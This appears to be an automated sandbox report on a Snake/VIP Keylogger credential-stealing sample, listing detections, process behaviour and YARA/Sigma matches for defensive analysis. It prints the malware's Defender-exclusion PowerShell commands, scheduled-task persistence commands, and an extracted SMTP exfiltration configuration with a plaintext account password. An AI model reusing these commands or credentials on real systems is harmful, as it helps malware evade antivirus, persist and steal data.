Edit tour

Windows Analysis Report
ZTEIhNCtP3.exe

Overview

General Information

Sample name:	ZTEIhNCtP3.exe renamed because original name is a hash value
Original sample name:	d3f111a50b8066dd7375a2fb8c8a06a732b48883fda4657063af671d1051f19b.exe
Analysis ID:	1631845
MD5:	9034fd2332697a391b0e218738c91e2e
SHA1:	f90397aa8cfe32f08d98c8bb02b93d72719fb5bf
SHA256:	d3f111a50b8066dd7375a2fb8c8a06a732b48883fda4657063af671d1051f19b
Tags:	exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ZTEIhNCtP3.exe (PID: 6164 cmdline: "C:\Users\user\Desktop\ZTEIhNCtP3.exe" MD5: 9034FD2332697A391B0E218738C91E2E)

powershell.exe (PID: 6324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5776 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6516 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ZTEIhNCtP3.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\ZTEIhNCtP3.exe" MD5: 9034FD2332697A391B0E218738C91E2E)

HgKRLOctZksk.exe (PID: 5404 cmdline: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe MD5: 9034FD2332697A391B0E218738C91E2E)

schtasks.exe (PID: 7096 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmpAC55.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HgKRLOctZksk.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe" MD5: 9034FD2332697A391B0E218738C91E2E)

svchost.exe (PID: 568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "587", "Password": "sales002@tmcksa.com", "Host": "OFFICE12london12#", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sales002@tmcksa.com", "Password": "OFFICE12london12#", "Host": "smtppro.zoho.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa38:$a1: get_encryptedPassword 0xd75:$a2: get_encryptedUsername 0x848:$a3: get_timePasswordChanged 0x951:$a4: get_passwordField 0xa4e:$a5: set_encryptedPassword 0x2175:$a7: get_logins 0x20c1:$a10: KeyLoggerEventArgs 0x1d26:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.3342384845.0000000000439000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e058:$a1: get_encryptedPassword 0x2e395:$a2: get_encryptedUsername 0x2de68:$a3: get_timePasswordChanged 0x2df71:$a4: get_passwordField 0x2e06e:$a5: set_encryptedPassword 0x2f795:$a7: get_logins 0x2f6e1:$a10: KeyLoggerEventArgs 0x2f346:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e078:$a1: get_encryptedPassword 0x71698:$a1: get_encryptedPassword 0x2e3b5:$a2: get_encryptedUsername 0x719d5:$a2: get_encryptedUsername 0x2de88:$a3: get_timePasswordChanged 0x714a8:$a3: get_timePasswordChanged 0x2df91:$a4: get_passwordField 0x715b1:$a4: get_passwordField 0x2e08e:$a5: set_encryptedPassword 0x716ae:$a5: set_encryptedPassword 0x2f7b5:$a7: get_logins 0x72dd5:$a7: get_logins 0x2f701:$a10: KeyLoggerEventArgs 0x72d21:$a10: KeyLoggerEventArgs 0x2f366:$a11: KeyLoggerEventArgsEventHandler 0x72986:$a11: KeyLoggerEventArgsEventHandler
0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ea78:$a1: get_encryptedPassword 0x2edb5:$a2: get_encryptedUsername 0x2e888:$a3: get_timePasswordChanged 0x2e991:$a4: get_passwordField 0x2ea8e:$a5: set_encryptedPassword 0x301b5:$a7: get_logins 0x30101:$a10: KeyLoggerEventArgs 0x2fd66:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: ZTEIhNCtP3.exe PID: 6164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ZTEIhNCtP3.exe PID: 6164	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ZTEIhNCtP3.exe PID: 6164	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: ZTEIhNCtP3.exe PID: 6164	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ZTEIhNCtP3.exe PID: 6164	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x29bd9:$a1: get_encryptedPassword 0x6c8dc:$a1: get_encryptedPassword 0x29f0c:$a2: get_encryptedUsername 0x6cc0f:$a2: get_encryptedUsername 0x299f3:$a3: get_timePasswordChanged 0x6c6f6:$a3: get_timePasswordChanged 0x29afc:$a4: get_passwordField 0x6c7ff:$a4: get_passwordField 0x29bef:$a5: set_encryptedPassword 0x6c8f2:$a5: set_encryptedPassword 0x2c110:$a7: get_logins 0x6ee13:$a7: get_logins 0x2c05c:$a10: KeyLoggerEventArgs 0x6ed5f:$a10: KeyLoggerEventArgs 0x2bcc5:$a11: KeyLoggerEventArgsEventHandler 0x6e9c8:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: ZTEIhNCtP3.exe PID: 6992	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ZTEIhNCtP3.exe PID: 6992	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: ZTEIhNCtP3.exe PID: 6992	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ZTEIhNCtP3.exe PID: 6992	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ce5b:$a1: get_encryptedPassword 0x2d18e:$a2: get_encryptedUsername 0x2cc75:$a3: get_timePasswordChanged 0x2cd7e:$a4: get_passwordField 0x2ce71:$a5: set_encryptedPassword 0x2f392:$a7: get_logins 0x2f2de:$a10: KeyLoggerEventArgs 0x2ef47:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HgKRLOctZksk.exe PID: 5404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HgKRLOctZksk.exe PID: 5404	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HgKRLOctZksk.exe PID: 5404	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: HgKRLOctZksk.exe PID: 5404	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HgKRLOctZksk.exe PID: 5404	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5f765:$a1: get_encryptedPassword 0x5fa98:$a2: get_encryptedUsername 0x5f57f:$a3: get_timePasswordChanged 0x5f688:$a4: get_passwordField 0x5f77b:$a5: set_encryptedPassword 0x61c9c:$a7: get_logins 0x61be8:$a10: KeyLoggerEventArgs 0x61851:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HgKRLOctZksk.exe PID: 7164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HgKRLOctZksk.exe PID: 7164	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.ZTEIhNCtP3.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.ZTEIhNCtP3.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.ZTEIhNCtP3.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc38:$a1: get_encryptedPassword 0x2df75:$a2: get_encryptedUsername 0x2da48:$a3: get_timePasswordChanged 0x2db51:$a4: get_passwordField 0x2dc4e:$a5: set_encryptedPassword 0x2f375:$a7: get_logins 0x2f2c1:$a10: KeyLoggerEventArgs 0x2ef26:$a11: KeyLoggerEventArgsEventHandler
7.2.ZTEIhNCtP3.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b0f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b356:$a4: \Orbitum\User Data\Default\Login Data 0x3bd35:$a5: \Kometa\User Data\Default\Login Data
7.2.ZTEIhNCtP3.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a4:$s1: UnHook 0x2e8ab:$s2: SetHook 0x2e8b3:$s3: CallNextHook 0x2e8c0:$s4: _hook
8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc38:$a1: get_encryptedPassword 0x2df75:$a2: get_encryptedUsername 0x2da48:$a3: get_timePasswordChanged 0x2db51:$a4: get_passwordField 0x2dc4e:$a5: set_encryptedPassword 0x2f375:$a7: get_logins 0x2f2c1:$a10: KeyLoggerEventArgs 0x2ef26:$a11: KeyLoggerEventArgsEventHandler
8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b0f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b356:$a4: \Orbitum\User Data\Default\Login Data 0x3bd35:$a5: \Kometa\User Data\Default\Login Data
0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ZTEIhNCtP3.exe.3975420.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZTEIhNCtP3.exe.3975420.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.ZTEIhNCtP3.exe.3975420.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2be38:$a1: get_encryptedPassword 0x2c175:$a2: get_encryptedUsername 0x2bc48:$a3: get_timePasswordChanged 0x2bd51:$a4: get_passwordField 0x2be4e:$a5: set_encryptedPassword 0x2d575:$a7: get_logins 0x2d4c1:$a10: KeyLoggerEventArgs 0x2d126:$a11: KeyLoggerEventArgsEventHandler
0.2.ZTEIhNCtP3.exe.3975420.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2be38:$a1: get_encryptedPassword 0x2c175:$a2: get_encryptedUsername 0x2bc48:$a3: get_timePasswordChanged 0x2bd51:$a4: get_passwordField 0x2be4e:$a5: set_encryptedPassword 0x2d575:$a7: get_logins 0x2d4c1:$a10: KeyLoggerEventArgs 0x2d126:$a11: KeyLoggerEventArgsEventHandler
0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc38:$a1: get_encryptedPassword 0x2df75:$a2: get_encryptedUsername 0x2da48:$a3: get_timePasswordChanged 0x2db51:$a4: get_passwordField 0x2dc4e:$a5: set_encryptedPassword 0x2f375:$a7: get_logins 0x2f2c1:$a10: KeyLoggerEventArgs 0x2ef26:$a11: KeyLoggerEventArgsEventHandler
8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a4:$s1: UnHook 0x2e8ab:$s2: SetHook 0x2e8b3:$s3: CallNextHook 0x2e8c0:$s4: _hook
8.2.HgKRLOctZksk.exe.3c45e40.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39c56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x392f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x39556:$a4: \Orbitum\User Data\Default\Login Data 0x39f35:$a5: \Kometa\User Data\Default\Login Data
0.2.ZTEIhNCtP3.exe.3975420.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39c56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x392f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x39556:$a4: \Orbitum\User Data\Default\Login Data 0x39f35:$a5: \Kometa\User Data\Default\Login Data
0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b0f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b356:$a4: \Orbitum\User Data\Default\Login Data 0x3bd35:$a5: \Kometa\User Data\Default\Login Data
0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a4:$s1: UnHook 0x2e8ab:$s2: SetHook 0x2e8b3:$s3: CallNextHook 0x2e8c0:$s4: _hook
0.2.ZTEIhNCtP3.exe.41e3440.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2caa4:$s1: UnHook 0x2caab:$s2: SetHook 0x2cab3:$s3: CallNextHook 0x2cac0:$s4: _hook
0.2.ZTEIhNCtP3.exe.3975420.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2caa4:$s1: UnHook 0x2caab:$s2: SetHook 0x2cab3:$s3: CallNextHook 0x2cac0:$s4: _hook
8.2.HgKRLOctZksk.exe.3c45e40.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.HgKRLOctZksk.exe.3c45e40.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.HgKRLOctZksk.exe.3c45e40.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2be38:$a1: get_encryptedPassword 0x2c175:$a2: get_encryptedUsername 0x2bc48:$a3: get_timePasswordChanged 0x2bd51:$a4: get_passwordField 0x2be4e:$a5: set_encryptedPassword 0x2d575:$a7: get_logins 0x2d4c1:$a10: KeyLoggerEventArgs 0x2d126:$a11: KeyLoggerEventArgsEventHandler
8.2.HgKRLOctZksk.exe.3c45e40.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39c56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x392f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x39556:$a4: \Orbitum\User Data\Default\Login Data 0x39f35:$a5: \Kometa\User Data\Default\Login Data
8.2.HgKRLOctZksk.exe.3c45e40.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2caa4:$s1: UnHook 0x2caab:$s2: SetHook 0x2cab3:$s3: CallNextHook 0x2cac0:$s4: _hook
0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc38:$a1: get_encryptedPassword 0x71258:$a1: get_encryptedPassword 0x2df75:$a2: get_encryptedUsername 0x71595:$a2: get_encryptedUsername 0x2da48:$a3: get_timePasswordChanged 0x71068:$a3: get_timePasswordChanged 0x2db51:$a4: get_passwordField 0x71171:$a4: get_passwordField 0x2dc4e:$a5: set_encryptedPassword 0x7126e:$a5: set_encryptedPassword 0x2f375:$a7: get_logins 0x72995:$a7: get_logins 0x2f2c1:$a10: KeyLoggerEventArgs 0x728e1:$a10: KeyLoggerEventArgs 0x2ef26:$a11: KeyLoggerEventArgsEventHandler 0x72546:$a11: KeyLoggerEventArgsEventHandler
0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f076:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b0f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e719:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b356:$a4: \Orbitum\User Data\Default\Login Data 0x7e976:$a4: \Orbitum\User Data\Default\Login Data 0x3bd35:$a5: \Kometa\User Data\Default\Login Data 0x7f355:$a5: \Kometa\User Data\Default\Login Data
0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a4:$s1: UnHook 0x71ec4:$s1: UnHook 0x2e8ab:$s2: SetHook 0x71ecb:$s2: SetHook 0x2e8b3:$s3: CallNextHook 0x71ed3:$s3: CallNextHook 0x2e8c0:$s4: _hook 0x71ee0:$s4: _hook
Click to see the 36 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZTEIhNCtP3.exe", ParentImage: C:\Users\user\Desktop\ZTEIhNCtP3.exe, ParentProcessId: 6164, ParentProcessName: ZTEIhNCtP3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe", ProcessId: 6324, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmpAC55.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmpAC55.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe, ParentImage: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe, ParentProcessId: 5404, ParentProcessName: HgKRLOctZksk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmpAC55.tmp", ProcessId: 7096, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 204.141.43.24, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\ZTEIhNCtP3.exe, Initiated: true, ProcessId: 6992, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49723

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ZTEIhNCtP3.exe", ParentImage: C:\Users\user\Desktop\ZTEIhNCtP3.exe, ParentProcessId: 6164, ParentProcessName: ZTEIhNCtP3.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp", ProcessId: 6516, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

